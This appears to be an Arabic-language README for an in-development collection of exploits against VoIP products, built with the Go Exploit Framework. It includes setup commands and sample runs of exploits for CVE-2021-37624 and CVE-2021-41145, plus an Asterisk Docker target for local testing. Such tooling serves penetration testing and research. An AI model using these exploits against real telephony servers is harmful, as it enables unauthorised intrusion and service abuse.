
مجموعة من الاستغلالات لمختلف منتجات VoIP.
قيد التطوير
مجموعة من الاستغلالات لمختلف منتجات VoIP. بفضل Go Exploit Framework.
إذا وصلت إلى هنا بحثًا عن حل لاختبار اختراق VoIP، فألقِ نظرة على Sippts (sippts-gui في Kali) أو SIPVicious. هذا المشروع أكثر تركيزًا على مرحلة الاستغلال.
git clone https://github.com/jesusprubio/bluebox.git
cd bluebox
go mod tidy
go mod vendor
نتبع الأنماط الموصى بها في Go Exploit Framework. وللتيسير، لا يتم تضمين الملفات الثنائية في هذا المستودع.
go run cve-2021-37624/main.go -v -rhost 127.0.0.1
go run cve-2021-37624/main.go -fll DEBUG -v -c -e -rhost 127.0.0.1 -rport 5061 -transport tls -msg ey -user dembele
go run cve-2021-41145/main.go -v -c -e -rhost 127.0.0.1 -fhost rand
يتم توفير ملف Docker Compose يتضمن خادم Asterisk للاختبار ضده.
task docker # Or `docker compose up -d`